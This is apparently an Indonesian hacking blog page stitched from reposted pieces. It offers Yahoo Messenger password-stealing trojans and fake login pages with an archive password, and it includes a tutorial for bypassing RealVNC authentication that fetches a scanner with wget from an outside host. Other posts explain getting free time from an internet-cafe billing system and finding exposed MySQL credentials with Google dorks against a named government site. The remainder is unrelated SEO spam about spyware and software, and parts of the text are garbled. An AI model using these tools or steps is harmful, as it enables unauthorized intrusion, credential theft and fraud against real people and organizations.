Yahoo Hacking Tools adalah Tools Portable dalam Kegiatan Hacking Yahoo messenger.
dalam Yahoo Hacking Tools ini terdapat Software :
1. Emo Creator
Tools untuk membuat Icon2
2. Fake Pager
Adalah aplikasi Yahoo Messenger Palsu, yang berguna untuk mencuri user name
dan password.
3. Magic Password
Trojan yang digunakan untuk mencuri password
4. Yahoo Booter.
Aplikasi untuk memboot lawan chating
5. Yahoo Fake Cam
Tools untuk mengecoh lawan chating dengan Cam Palsu
6. Yahoo Fake Login
Halaman Login Palsu Yahoo (2008), yah buat nyuri password orang yang akan dikirim ke email
7. Yahoo Pass Stealler
Trojan Builder untuk nyulik password
8. Yahoo Hack
Yahoo messengger Palsu
9. Yahoo Pass Crack
Crack Password Yahoo seseorang
10. Yahoo Password Recovery
Untuk mengetahui Password dan user name ym seseorang
Download Disini
Password : h4ck3v1l
Neh Artikel Juga Gw Ambil Dari Rum Sebelah Artikel Ini Gw Terbitin Hanya Semata - mata untuk Pengetahuan....
This Basic tutorial will teach you how to hack real VNC server databases.
some servers have mysql database and important information like Credit Card INFORMATION.
so it will depend on what ip range or what server are you scanning and what kind of server is running.
you can hack linux servers, sunos servers, mac os servers,xp servers etc. as long as they are vulnerable to
VNC AUthentication Bypass and using REAL VNC so this software will only bypass the real vnc software its like
Remote desktop in there servers.
The things you need here is:
1. RealVNC <= 4.1.1 Bypass Authentication Scanner
2. VNC Viewer Authentication Bypass
3. Linux uid shell or rootshell
any of these tools will not held me resposible for any damages or action to the servers that
you have hack its your own free will.if you want to download it or not its your choice. or you
can try to find or search tools like this in the net.i just got this tools from some servers too.
im just sharing informations :)
(RealVNC <= 4.1.1 Bypass Authentication Scanner) for linux shell only
(VNC Viewer Authentication Bypass link) windows base software
(Linux uid shell or rootshell)
Go Find your own shell to use
so after you have gathered the tools you needed LETS START!first login to you shell
then try to scan for vulnerable vnc servers by using the (RealVNC <= 4.1.1 Bypass Authentication Scanner).
after scanning the output of your scan will go to VNC_bypauth.txt. all you need to do is cat VNC_bypauth.txt.
then it will show the vnc servers you have scan if vulnerable or patch or banned so just get the VULNERABLE IPS
then use the ip put it in the (VNC Viewer Authentication Bypass link) server box and just click OK.it will try to
bypass auth the real vnc server if successfull you will be able to get in there desktop or server.
this will be the process command output on the shell.
-sh-3.2$ wget http://upsstoreflorida.com/images/VNCscan
–09:47:54– http://upsstoreflorida.com/images/VNCscan
=> `VNCscan’
æ£å¨æ¥æ¾ä¸»æ© upsstoreflorida.com…
æ£å¨é£æ¥ upsstoreflorida.com||:80… é£ä¸äºã
å·²éåº HTTP è¦æ±ï¼æ£å¨çååæ… 200 OK
é·åº¦: 42,895 (42K) [text/html]
100%[====================================>] 42,895 34.24K/s
09:47:58 (34.16 KB/s) — å·²å
²å âVNCscanâ [42895/42895])
-sh-3.2$ ls -al
ç¸½è¨ 124
drwxr-xr-x 2 sally users 4096 2009-07-08 09:47 .
drwxr-xr-x 6 sally users 4096 2009-06-13 22:41 ..
-rwxr-xr-x 1 sally users 42895 2009-04-25 19:37 v
-rw-r–r– 1 sally users 27730 2009-07-08 10:24 VNC_bypauth.txt
-rwxr-xr-x 1 sally users 42895 2009-05-07 16:05 VNCscan
-sh-3.2$ ./VNCscan 符æ¬éç ä½
-sh-3.2$ chmod +x VNCscan æ
-sh-3.2$ ./VNCscan
========RealVNC <= 4.1.1 Bypass Authentication Scanner=======
============multi-threaded for Linux and Windows=============
[+] Usage: VNC_bypauth
Neh Artikel Gw Ambil Dari Rum Sebelah
Sebelumnya kepada para master binus hacker saya mohon izin untuk menulis trhread ini karena tujuan saya adalah untuk memberitahukan kelemahan dari billing dari warnet versi lama yg ditemukan oleh adik saya sendiri namun atas izin dia sayamempublikasikannya.Sebelumnya saya sudah coba cari kelemahan dari indobilling versi lama ternyata semuanya cuma omong kosong.
Jadi mulanya ditemukan kelemahan ini secara tidak sengaja oleh adik saya yang mulanya hanya iseng,namun itu pulalah menyebabkan ditemukannya kelemahan dari theread yang anda baca sekarang. Tujuan dari theread ini sebenernya ada supaya bermain internet secara gratis,tapi jangan terus-terusan ntar ketagihan dapat musibah ntar dari tuhan dan lagian nanti ntar bakal malu kalo ketahuan. Hhhee…
caranya cukup simple atau trbilang mudah dan tidak perlu mengeluarkan otak dan fikiran yg cukup besar dengan hanya mengetahui kuncinya semuanya dapat menjadi gratis.
Jadi tanpa perlu basa basi lagi saya langsung mengungkapkannya:
*kita masuk kedalam warnet dan langsung dihadapkan pada billing yg menanti kita.
*disitu ada tulisan guest ato masukkan nama atau login
*kalau ingin hal ini berhasil jangan lakukan apapun jg dulu
*cari dikeyboard gambar windows + d + gambar windows lagi
nanti kita pasti akan dihadapkan pada window start
*lalu kita cari browser yang berupa mozilla firefox yg terdapat pada pada windows start tadi, jika sudah menemukannya lalu klik enter.
*langkah selanjutnya yg harus kita lakukan adalah windows+d lagi.
*jika sudah tidak kelihatan lagi kita langsung klik Alt + Tab nanti kita lihat ada gambar billing dan browser firefox.
*apabila kamu ingin masuk tanpa bayar sedikit pun arahkan Alt + Tab + Tab yg mengarahkan langsung kepada browser firefox mozilla.
*dan jika kamu tidak mau melakukan kecurangan apapun silahkan arahkan langsung kepada indobilling yg tersedia.
Bagaimana tanggapan kalian, jika berhasil kepada semua orang yang membacanya saya hanya berpesan jangan jadi orang yang membuat org lain jadi susah. Lakukan hal diatas jika kamu terdesak saja msalnya tidak punya uang sementara tugas menumpuk dan harus dicari di internet. Sebaiknya gunakan secara bijak dan adil. Karena sepandai-pandainya tupai melompat pasti akan jatuh juga
Walaupun ide dasar teknik ini saya temukan dari sebuah forum, namun ada baiknya digunakan untuk menambah pengetahuan bersama (maaf bagi kakak2 yg sudah ahli karena tulisan ini ditujukan untuk temen2 yg belum tahu). Kecerobohan seorang webmaster dalam membuat file konfigurasi password sql bisa berakibat fatal. Misalnya saja jika konfigurasi password tersebut disimpan dalam ektensi inc, yg mana biasanya file yg disimpan dalam ektensi tersebut akan bisa langsung dibaca isinya oleh client, tidak seperti jika disimpan dalam ektensi php misalnya. Sumber Artikel
Mendapatkan password mysql tersebut akan sangat mudah dilakukan dengan bantuan google, misalkan dengan sintax filetype:inc intext:"mysql_connect" site:id ataupun inurl:"password.inc" intext:"password" .
Saya coba memasukkan syntax filetype:inc intext:”mysql_connect” site:id (mencari file berektensi inc yg didalamnya ada kata mysql_connect dan berada di dalam server indonesia, jika syntax site:id dihilangkan maka akan terdapat banyak sekali hasil yg didapat). Terdapat beberapa hasil, kemudian saya coba www.bkpm.go.id.
Saya coba mengakses server tersebut melalui mysql client dari komputer saya, dan ternyata koneksi ditolak. Saya pikir mungkin saya tidak bisa mengakses karena mungkin difilter oleh firewall ataupun memang server tersebut tidak mengijinkan alamat luar untuk mengaksesnya. Kemudian saya coba-coba untuk mengakses server tersebut lewat phpMyAdmin (ternyata phpMyAdmin masih terpasang/digunakan dan membolehkan koneksi dari luar), yaitu http://www.bkpm.go.id/phpmyadmin/ dan ternyata bisa (karena akan dianggap sebagai koneksi dari web servernya sendiri).
Sedangkan contoh server yg membolehkan akses melalui mysql client dari alamat luar adalah
Dari hal2 diatas mungkin bisa sedikit menambah pengetahuan bagi administrator agar lebih berhati-hati dalam mengamankan mysql servernya.
Artikel Tutorial Ini Gw Ambil Dari Bang Ajie Site
Berikut adalah kumpulan video hacker yang bisa didownload lengkap dengan banyak tutorialnya. Langsung aja download. Artikel ini aku ambil dari cyberphreaking.com dan tempat lain . Jika ada komplain maka artikel ini akan di unpublish,
1. DeluxeBB 1.06 Exploit (9mb)
Remote SQL Injection Exploit
2. NetBios Live Hack (5mb)
Shows how to use Super Scan to Hack Netbios opened on remote PC (Port 139)
3. Classified (7mb)
Shows how site classified is Hacked.
4. NASA (2mb)
NASA Department website Hacked.
5. Linux Network Monitor (5mb)
This video shows you how to set up ntop, a network monitoring program, on GNU/Linux. Ntop features a web interface that displays tons of information about bandwidth utilization, traffic patterns, etc. It even shows you what applications are using bandwidth on your network such as ftp, bittorrent, http, dns, etc.
6. Linux DNS Server (11mb)
This video explains how to set up a DNS server on a GNU/Linux server. In the video I explain a little bit about how DNS works, then I install and configure BIND in a chroot jail on 2 DNS servers in a master/slave relationship. This video is specifically tailored to setting up DNS for a web server.
7. Windows Web Server (6mb)
This video details the installation and configuration of Apache, MySQL, and PHP on Windows. This video is made specifically or those using Windows 2000 Pro, Windows XP Home, or Windows XP Pro.
8. Win Server 2003 IIS and DNS (4mb)
This video shows how to install and configure IIS and DNS on Windows Server 2003 for virtual hosting. These procedures will work with all versions of Windows Server 2003 and possibly with Windows 2000 Server.
9. Hacker Defender Movie (8mb)
Shows how Brilliant Hacker defender bypasses several rootkits detectors. You can see bypassing IceSword, BlackLight, RootkitRevealer and more.
10. 0-DAY Simple SQL Injection (8mb)
A film project about a cracker with the name zer0day. (Hacking with Linux -php)
11. wbb (10mb)
wbb portal hacked by XSS.
12. Reverse Engineering (20mb)
Reverse Engineering with LD PRELOAD
13. SWF File Vulnerability
Multiple Websites Embedded SWF File Vulnerability Demonstration
14. IPB 1.3 SQL (10mb)
Invasion Power Board 1.3 SQL Injection Exploit
15. Qnix Buffer Overflows (11mb)
Qnix Demonstrating Exploration of Simple Buffer Overflows
16. ASP SQL (5mb)
Simple ASP Administrator SQL Injection (5mb)
17. Blind MySQL (9mb)
Demonstration of Blind MySQL Injection (bsqlbf)
18. D-Link Wireless (3mb)
Intruders D-Link Wireless Access Point Configuration Disclosure
19. Mysql bftools (8mb)
Demonstration of Blind MySQL Injection (mysql_bftools)
20. PHP Remote File (9mb)
PHP Remote File Inclusion Windows Backdoor.
21. Cracking WEP in 10 Minutes (30mb)
A short demo of a wireless WEP attack. This is an interesting technique, where packets are injected to the access point, making it release weak IVs. You'll think twice about WEP after this
22. Tunneling Exploits via SSH (18mb)
An intensive demo showing how SSH Tunneling techniques can be used to exploit an interal, non routable network.
23. A classic client side attack (18mb)
The MS06-001 vulnerability was used to execute a reverse connect shellcode. More information about this vulnerability can be found at the Microsoft site - MS06-001.
24. C++ Video tutorials (29mb)
Nice C/C++ Shockwave videos.
25. Interview with Kevin Mitnick (12mb)
He was on fbi's most wanted list, a nitrous Hacker but now see Kevin's Interview after being freed what he has to say about his past and future.
26. Unix Shell Fundamentals (40mb)
VTC Unix Shell Fundamentals Video Tutorials. You need Quicktime player to view the videos.
27. Microsoft.com Bugs
Nice videos shows of old bug that was exploited on the site.
28. Bitfrost Server Crypting (15mb)
This is nice video for any one learning how to add bytes to make there server undetectable. The rar Password is Crypt.
29. WMF File Code Execution Vulnerability With Metasploit (38mb)
This video covers the use of the recent (Jan 2006) WMF file code execution vulnerability with Metasploit. It shows how to shovel a shell back to the attacker with the WMF vulnerability. See Microsoft Security Advisory 912840. Thanks to kn1ghtl0rd, AcidTonic, Electroman and livinded for their help.
30. SSH Dynamic Port Forwarding (30mb)
I set up a quick video tutorial to show how to set up an encrypted tunnel using SSH's dynamic port forwarding (sort of a poor man's VPN) in both Linux and Windows. The tools used are OpenSSH, PuTTY and Firefox, but it should be enough info to allow you to figure out how to set up other clients.
31. Using VMware Player to run Live CDs (Bootable ISOs) (46mb)
In this video I show how to use the free VMware Player to run Live CDs like Knoppix, Auditor or Bart's PE Builder from an ISO
32. Adding Modules to a Slax or Backtrack Live CD from Windows (43mb)
33. Make your own VMs with hard drive for free: VMware Player + VMX Builder (16mb)
34. Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text.info (44mb)
35. Droop's Box: Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools (67mb)
36. WiGLE, JiGLE and Google Earth: Mapping out your wardrive (72mb)
37. Finding Rogue SMB File Shares On Your Network (60mb)
38. Nmap Video Tutorial 2: Port Scan Boogaloo (13mb)
This video covers some intermediate and advanced Nmap options and is a follow-up to "Basic Nmap Usage" presentation.
38. Metasploit Flash Tutorial
This video covers the use of Metasploit, launched from the Auditor Boot CD, to compromise an unpatched Windows XP box by using the RPC DCOM (MS03-026) vulnerability. It then sends back a VNC session to the attacker. This is just one example of the many things Metasploit can do.
39. Using VirtualDub and a cheap webcam as a camcorder (10mb)
I thought this might be of use to those that would like to submit something to Infonomicon TV or Hack TV but lack the cash for a proper MiniDV camcorder.
40. Cracking Syskey and the SAM on Windows Using Samdump2 and John (25mb)
Suatu saat mungkin anda pernah sengaja atau tanpa sengaja mengirimkan Friend Request kepada pengguna Facebook yang sebenarnya tidak anda inginkan, atau bisa juga sebaliknya dimana anda yang menerima Friend Request dari mereka. Bisa jadi itu mantan pacar, musuh bebuyutan anda di masa sekolah atau orang iseng yang hanya ingin mengganggu akun Facebook anda . Lalu bagaimana cara mengatasinya?
Akankah anda menghapus akun anda dan menggantinya dengan yang baru? Atau anda akan offline selama-lamanya? Nah, sebelum melakukan tidakan sedrastis itu, sebaiknya anda ikuti dulu langkah-langkah sederhana berikut ini:
Langkah 1
Setelah melakukan login dengan email, pilih menu Settings yang ada di bagian atas dan klik Privacy Settings.
Langkah 2
Pada halaman Privacy Settings anda akan menemukan kotak Block People di bagian bawah.
Untuk memasukkan daftar orang yang akan anda blok, tuliskan namanya pada kotak Person (lingkaran merah) lalu klik tombol Block.
Dengan melakukan blokir terhadap orang tertentu, maka orang tersebut tidak akan bisa menemukan akun anda, melihat profil maupun berinteraksi dengan akun Facebook anda secara langsung. Hal ini juga bisa anda lakukan terhadap orang yang sudah ada didalam daftar Friend List, setelah di blokir secara otomatis orang tersebut akan terhapus dari Friend List anda.
Rahasia neh bro ngga ada artikel seperti ini di mana pun hanya ada di sini
It is very easy to find spyware and adware removal online sources. All you require to do is a simple search over the World Wide Web through search engines. Spyware and adware are very dangerous for your PC. They tend to infect if your computer is connected with the World Wide Web. A research statistics has concluded that there are a lot of spyware and adware coming up these days. However, the best part is that there is an increase in the number of spyware and adware available too, these days. These tools hold expertise in eliminating these trouble causing elements from your computer.
If you want to make some great purchase for anti spyware and adware tools, you must try going through spyware adware removal reviews. These days, almost every computer that�s connected to the internet is infected by adware and spyware. The worst part is that as soon as these tend to get into the hardware of your computer, it is very difficult to remove them because these cannot be located easily. Spyware and adware are extremely damaging to the computer. Hence, it becomes compulsory to install best anti spyware and adware tools.
The concept of spywae protection has become an important issue, these days. You would find numerous programs dealing with spyware and adware on the internet. The increasing demand of these programs has created stiff competition among the vendors. This has also led to some attractive free offers being made to clients. However, you need to be careful when going for free anti spyware and adware programs as these are available with some restricted features. In case, a �free� program claims to offer you all the requisite features, it would be only for a stipulated span of time. You may need to upgrade the program once the trial period is over.
Anti spyware and adware tools available online, function in two different ways. Some of these only work towards prevention only the latest spyware or adware from invading your computer. Others are efficient in eliminating the existing spyware in the computer and also prevent a new attack. All you require to do is to do some scanning when looking for the latest spyware and adware removal tools.
The latest programs are available with varied options for scanning as these scan computer from malicious stuff that can be harmful for the computer. The latest spyware removal tools keep an eye on all the sites you visit and list out suspicious ones.
Anti spyware and adware programs are widely available on the internet. Due to the stiff and you tend to get these for free. However, you must ensure that your vendor is trust worthy.
The best thing to do is to shop around a little. Go through review on the websites for benefits and flipsides. This will help you to purchase the best of spyware and adware removal programs.
With so many advantages of anti spyware and adware tools, people are dying to get through some of the best spyware and adware removal online sources.
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Combine the power of Anti-Spyware with the industry's most sophisticated spam and phishing defense, Spam Controls. Defend your PC and your privacy against dangerous spyware, malware and phishing attacks now with one simple, integrated solution! Active Protection (Real-Time Blocking), Customizable scanning processes, Backup and Restore feature, Detects and quarantines spam from Outlook and Outlook Express.
Scrupulous detection and removal of adware, spyware, pop-up ads, keyloggers, trojans, hijackers, malware, and other potentially unwanted applications
One of the largest and continually growing definition databases of known and emerging threats in the industry protects Anti-Spyware users, detects near 300000 threats!
Cycle Detection, the first of its kind and exclusive to Anti-Spyware, prevents recurring loops where an alert message pops up repeatedly by detecting this loop and presenting these details so you can stop the loop in its tracks
Easy to set-up and use within minutes! No complicated rules to set-up and manage - Spam Controls does it all for you!
Free automatic spam database updates for the life of your subscription.
One of the highest detection rates in the industry, averaging a 97% detection rate!
Customer Care and Support that is second to none as we consider it a privilege to be of service to you and look forward to being a part of your PC security strategy as we ensure that you are never alone in your endeavour to secure yourself and your PC from spyware and spam.
Repair&Secure Software Union organization comment:
This is great anti-spyware tool and we are proud to distribute it. Extremely large database of available spyware. Perfect addition to XoftSpy SE, another outstanding anti-spyware tool.
Yang binggung dengan data base oracle dan bagaimana caranya mari simak di sini bro
There are some very large, very powerful companies out there that have saved quite a bit of money using an Oracle database. Will your company be one of those? Or, will you simply overlook this opportunity? In order to know if in fact an Oracle database will help you, perhaps you have to know a little more about it. Also, you need to realize the differences that are out there in various versions of the Oracle database. Gathering this information will help you make a sound decision about the use of this product in your business.
First, realize that the Oracle database is available to be used and can be benefited from by virtually any size of business. Large corporations, medium sized companies, and even small organizations can all benefit here. What makes it nice to everyone as well is the lower prices that are currently being offered on Oracle database systems. There is no doubt that the introductory price is something to turn heads.
The system we will mention here is the Oracle Database 10g Products. These are, believe it or not, the first databases designed for grid computing in the industry. Your options are many:
• Enterprise Edition: Packed full with the highest level of performance and scalability. You will find reliability in OLTP as well as in decision support, and management activities.
• Standard Edition: Clustering support is provided with this 4 processor version.
• Standard Edition One: Same great stuff with a 2 processor version that is perfect for the entry level.
• Personal Edition: Perfect for an individual
• Lite Edition: Great option for managing mobile database applications.
While the features of each of these Oracle database options are many, it makes sense for each and every business out there to find out how well these products can serve their basic needs. Take a moment to see what they can do for you and you may just be impressed with the options that are available to you in Oracle database.
Did you find this article useful? For more useful tips and hints, points to ponder and keep in mind, techniques, and insights pertaining to computers, software, viruses and data recovery, do please browse for more information at our websites.
Maw taw cara kerjanya virus jaringan? klik aja langsung nancep d artikel gw bro
Spyware and viruses infect an individual or business computer in many ways, from the obvious methods to the sneaky, back door tricks. Viruses are designed to interrupt and alter normal computer functioning and spyware is intended to literally spy on its victims, all the while recording their personal information. Either infection, no matter what the method in which it intruded by, can cause an array of difficulties for the computer user. Often times viruses and spyware are put into your computer by opening insecure emails and sharing files with infected computers. Spyware also intrudes as a "ride along" on third party software you might purchase and download online. In other situations spyware and viruses find a "back door" in your computer and use it to install their malicious codes. Signs your computer has been affected by viruses or spyware could be unusual behavior and slower functioning. Unauthorized dial out from your internet connection are most likely spyware applications. Other common signs include browser crashes, longer boot ups, more pop ups and possibly missing files. To get rid of any virus or spyware infection back up your files and scan them for viruses and/or spyware. Keep your virus and spyware software updated and run the scans regularly. If you have no spyware or virus scanning software it is recommended you find a free programs that will detect and warn you of possible infections. Once you have the proper software it is important to get rid of spyware infections and viruses as well as protect your privacy and your computer from further invasions. If spyware has latched onto your computer and at scanning tool catches it you will most likely have to remove the entire programs to completely rid yourself of those spyware applications.
Spyware will exploit your computer of anything it can use for monetary gain, for as long as it can remain attached to the host. Spyware is content to sit on a single computer, to monitor what the user does, as is the case with tracking adware; or influence where the user visits, as is the case with targeting advertisers who use browser helper objects that pop-up ads, substitute search engines, and hijack home pages.
Viruses can be intentionally destructive and have been known to erase or corrupt file systems or abet denial of service attacks. Spyware is more interested in having the host remain healthy: a non-functional computer has neither advertising value nor revenue potential to spyware. So spyware typically remains non-destructive, unless you try to remove it. But many spyware packages are removal resistant: you may uninstall them only to find they reappear when you reboot your computer. Others modify many critical components of a computer operating system and incomplete removal often renders the computer inoperable.
Susah dengan ppc google? neh gw punya trik n tips nya bro tinggal klik aja kebuka deh artikelnya
Google Adsense is a program that allows businesses to advertise on other websites
Google Adsense is a program that allows businesses to advertise on other websites. They business only pays the host website when a consumer clicks on the link to take them to their website. This is a very effective way of advertising because of the millions of people who access the internet every day. It is also a low cost marketing method that businesses of all sizes can benefit from. Websites are eager to host advertisements for other businesses because it doesn't cost them anything and they earn money for doing it when consumers choose to follow the link from a particular advertisement.
If you are interested in using Google Adsense to advertise then you need to make sure you are aware of their policies. This will make the process smoother for you and eliminate any misunderstandings down the road. This can be a great money maker or advertising tool, but only when it is used correctly.
There is no long term contract with Google Adsense. You can choose to leave the program at any time. You will need to provide written notice by mail or email to Google. All ads will be removed from your website within ten days. They also have the right to discontinue your business from the program at any time for not following their policies. You do have the right to file an appeal if your account is canceled. This gives you the opportunity to discuss the situation with a Google Adsense representative.
You must be approved by Google Adsense before you are allowed to be a part of the program either as a host site for advertisements or to post your ads. The owner of the website must be at least 18 years of age. The approval process involves an application that you complete with information on your website including keywords. You will have a response to your application within two days. Make sure it is completed entirely or your application will be denied.
All communications must take place with Google. This means if you have concerns or issues about an advertisement your business has on a website or about an ad you are hosting on your website everything goes through Google. The two businesses are not to discuss the issue between each other. Google does not guarantee a set amount of clicks or earnings for a host website. It also doesn’t guarantee any increase in traffic or sales for a business.
Google Adsense has the right to use the name of businesses participating in the program for presentations, marketing, and financial reports. Users of Google Adsense are required to pay for the amount of pay per clicks their ads received as outlined. Adsense accounts are non-transferable under any circumstances. They can’t be resold to another provider. A maximum of three ads per webpage can be displayed. Advertisements can't be placed on webpages that don't contain content for your website. A webpage can't be used for the sole purpose of displaying ads to make money.
Click fraud is not acceptable at all by Google Adsense. It damages the reputation of the program and costs the advertisers a great deal of money. Any website hosting advertisements that are believed to be involved in Click Fraud will be banned from using the program. If you chose to use Google Adsense to advertise your business, protect it from Click fraud by purchasing Click Fraud software.
Google Adsense is a great opportunity for businesses to advertise their products and services on various websites and pay only for the number of consumers who click on the link to go to that businesses website. It is also a great way for a business to make money by hosting advertisements for other businesses. Understanding the policies of Google Adsense will help you determine if the program is right for you. It also helps the program work properly for all those involved in it.
There are many people who ask as to which are the best blog and ping software’s around. Blog and ping software’s are software’s that can automatically post information and links from your websites to the blog sites so that they can be easily searched by sites like Google and Yahoo. The final result is that your site will become more famous and will reach the top rankings in Google and other search sites.
Word press and RSS to Blog are one of the most widely used software’s by people all over the world. They automatically send information about your site and links to all the blog sites at the click of a button. They can save your list of links for future use also. Very good software to use for blog and ping is BlogSolution. BlogSolution is one of the most advanced blog, ping and SEO software’s around. It brings in results quickly and it is very effective or visit You can make your site easily searchable by search engines as the software posts your links directly on thousands of blogs in one go. The whole process can be achieved thorough the click of a button.
BlogSolution can at least creates hundred blogs a second using its own highly advanced blogging platform. BlogSolution is a multi manager as all your BS2 domains can be managed from a single place. It easily interlinks your sites and also posts one way links to your sites. There is a very good feature by the name of Smart jobs that automatically creates blogs in your absence.
BlogSolution indexes entries very quickly using the Indexing Turbocharger which leads to extremely fast indexing. BlogSolution can get more spiders than any other blog software at present. The interface of BlogSolution is extremely simple to use and is very user friendly. You can learn the full use of BlogSolution within a short period of time with its help tool. There are also video tutorials provided with the package. Using BlogSolution you can post hundreds of one way links on various sites.
If you use BlogSolution then you don't need to use any other blogging solution. BlogSolution takes care of all your blogging needs and brings in positive results for your site very quickly you can visit if you would like to test BlogSolution first before buying it then you can download demo software from the BlogSolution website. Once you are satisfied with its performance you can buy the software online paying through your credit card.
Hence we see that BlogSolution is the best blog solution ever found. The users of BlogSolution have found it to be extremely effective and also they would not like to use any other blog software. It is the next generation software that has taken the world by storm with its simple user interface and bringing in positive results for all its customers. Watch your income grow as more and more people can find your website on the search engines and order for products and services.
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It is quite a rarity to encounter persons who are not yet familiar with the word podcast. Since its birth in 2003, podcasting has reached different heights in the World Wide Web. Now, podcasting is very popular. With its popularity, there are many tools available for podcasting and one of them is the podcasting software.
For more details go to: www.software-designers-pro.com Podcasting has not only satisfied the discriminating taste of many internet users but it has also brought satisfaction to many online marketers. These online marketers make use of podcasts for marketing. Podcasts can enhance their web sites' appeal to the target customers and also capture the attention of many internet users.
It's very interesting to make your own podcasts that is why it is necessary that you learn the right steps to podcasting. There are many materials on the internet where you can get the information you will need in learning how to podcast. Like there are training videos on podcasting that you may own and study. Most of these videos are filled with useful information and graphics that will make your learning easier. With the knowledge one can gain from these tutorial videos, you are now ready to choose a podcasting software that you need.
One aspect that you have to consider is the audio recorder included in the software. It must enable you to come up with quality audio that will match your existing operating system. A good audio quality must be paired with a good audio editor. So, make sure that your software is equipped with these features. Furthermore, be aware of the output format. MP3 format is most compatible for audio while MPEG format is most suitable for videos. These output formats are manageable in terms of size and need not be converted or compressed. Creating video podcasts are quite simple but it will be a great time saver if you gather tips on video podcasting first.
Another added useful feature in software is its capability in creating RSS feeds. RSS will surely help enhance the distribution of your podcasts to a larger audience. In particular, if you have iTunes feeds you can reach maximum exposure for your podcasts. For can visit to: www.viral-toolbar-builder.com you may be able to take shortcuts in making video podcasts easily if you own the right software to support you. Creating Podcasts in an hour is made possible with a step-by-step guide on video podcasting. Before finally purchasing podcasting software, you need to make certain that your software has a file transfer program.
Otherwise, you will not be able to upload your podcast. When your podcasts are ready for publishing, it will be best if you submit them to as many directories as possible. The more visible they are, the more exposure and traffic you get. It's never too late to learn how to do podcasting. Remember that podcasting is an in-thing on the net these days and is projected to stay this way farther. You do not have to be an internet techie to learn podcasting. With the influx of tools available in the market, podcasting has been made easy and accessible to all.
Widih makin serem ada program spyware online maw baca lebih lanjut artikelnya bro? silahkan ini bukan tentangce bugil, atau ngentot lain -lain tapi tentang hacker bro.Warning gw bikin artikel ini semata" hanya untuk pengetahuan...
Most Internet users recognize the need of protecting their computers against viruses, as the vast majority of us sooner or later become painfully aware of these nasty little programs when they shut down our PC, spam our mailbox or delete our files.
Internet: Spyware Programs
Enlarge Image
Viruses are, however, not the only malicious software programs out there. The newest addition to the evil software family is the so called Spywares and a good anti-virus program or firewall is not enough to safeguard against these clever programs.
Spywares are known by many names such as adware, trojans, malware, browser hijackers etc. The thing they all have in common is that they will transmit your personal information to companies and individuals who have an interest in knowing about your surfing habits, online purchases, credit worthiness, interests, web searches, chats, birth date and even your credit card number. For more information logon to www.change-ur-mind.com .The list goes on and on, since Spywares are constructed by promotional companies who need to know as much as possible about the online consumers to target them effectively. By ewes dropping on you online, these companies hope to be more successful when sending out promotional materials.
Spyware usually enter your PC by piggybacking on other software downloads. Every time you use downloaded or otherwise shared files, including Freeware, Shareware or p2p sharing programs, you stand the risk of unknowingly infecting your computer with Spyware. Even confirmed virus free music files, films and computer programs can have Spyware stowaways. Once inside your computer, they will hide, monitor all your actions and promptly start telling your secrets to anyone willing to listen.
Contrary to most viruses the Spywares actually make an effort not to be observed. Since they won’t cause obvious harm such as deleting important files or shutting down your computer, they can thrive in your PC for years without you noticing, sending out massive amounts of information about all your online habits.
At a first glance, you might find this annoying but essentially harmless. Why not let the companies send me promotional material about things I am actually interested in? Spyware is however far from harmless, since the infiltration by Spyware not only let the companies know about your latest online search, but also much more private matters such as credit card details, online purchases of medicine and your private e-mail correspondence with family, friends and business partners. There are even examples of how this massive gathering of personal information has led to an overall loss of privacy and stolen identities. In the computerized world of today it is not hard to imagine the amount of damage and personal suffering the fraudulent use of a persons¡¯ identity can cause.
It is obvious to anyone that we must start combating the Spyware programs, but the best way of doing this is not to panic and pull the plug on your PC, never go online again and keep five feet away from all Freeware.
gimana liad judulnya aja dah serem kan? neh artikel nya bro
As a research tool, Google was a great help to a law school student as she gathered online research sources for her thesis on money laundering. As you can imagine, this was definitely a great tool to her in the process of writing her thesis. Soon, she began to have the problem of her search terms taking her to pages completely unrelated to money laundering.
After the persistency of the problem caused the student to rethink her initial belief of a problem within the search engine or her internet system, she quickly came to realize someone had bugged her. Whenever we are bothered by human annoyances, those are easily dealt with. Stopping adware and spyware, the type of bugs that plagued the student, is much more difficult. The law school student was definitely not an advanced student of technology, as she typically only used her computer for school related purposes of research and writing.
Seemingly complex computer problems that boggle the minds of most computer uses, like the law student, can typically be summed up with the words spyware and adware. Though it did not gain popularity until 2000, the term 'spyware' was first introduced in 1995. This refers to any software program or script which allows admission to the computer owner's personal information.
This can be done through studying keystrokes, logging web browsing activities, and perhaps most worrying of all, the contents stored on a user's hard drive. The scary spy tactics used by spies in Hollywood movies are nothing next to the very real and present danger afforded by spyware to everyone who owns a computer. The invasive monitoring of internet activities makes it safe to call those affected victims. Spying on criminals with spyware makes sense because it can help society for the greater good, but too often this program is used to track sensitive personal information, such as credit card information. The need for a great, up to date anti-spyware program should be obvious.
While blocking spyware, you should also block adware and malware to fully protect your system. Online adware and spyware blocker programs are easily available to help in this endeavor. Spyware, adware, and malware prove that computer bugs do not have to be self replicating, like viruses and worms, to prevent the normal usage of computers. Unfortunately, the immense slowing down of infected computers is one of the side effects that can result from these programs. Despite sluggish systems and continual privacy invasions, some spyware programs are able to hide themselves well enough to prevent anyone from identifying them as the culprit. The best way to prevent the side effects of these malevolent programs is to install a good blocker to stop them from downloading onto your system.
Visit us for more information and advice at
http://jaclis.bezoogle.com/pp/adware/ My Source Articles
The internet is truly incredible. Our lives are constantly eased and enhanced by new and innovative technologies, created by brilliant minds, that allow us to socialize and conduct business effortlessly via the internet. However, there are equally brilliant minds that will use these same technologies to attempt to wreck havoc on our lives. Surfing the internet can be a dangerous activity these days. Surfing anonymously is one of the best precautions that one can take to stay one step ahead of the malicious intent on the web. Here are 2 big ways that anonymous surfing can keep you safe.
Internet Privacy
Everything that you do online is associated with your IP address, thus all of your information is obtainable by a good hacker or even a bad hacker with a good hacking program. Your IP address is kept on every web server log file on all of the websites that you go to, and in all of the e-mails that you send out. If you are browsing websites using your real IP address, your IP address will expose information about you that you probably don't care to reveal. Your IP address can even be used to pinpoint the very city you live in and even the carrier you use for your Internet service. It is a scary thought that you might have that much information floating out there about yourself. That leaves you feeling vulnerable, doesn't it? Surfing anonymously will allow you to cruise the web without leaving a detailed, information trail behind you.
The concept is pretty simple; using specialized software, your computer connects to a server, known as an anonymous proxy server, which then makes a connection to the internet. Your location, all of your personal information and your complete identity will be masked. The proxy server works by sending its IP information to the websites that are requesting it, while blocking yours from the web. Your internet connection and communication online will also be encrypted, using SSL technology and SSH tunneling.
Malicious Software
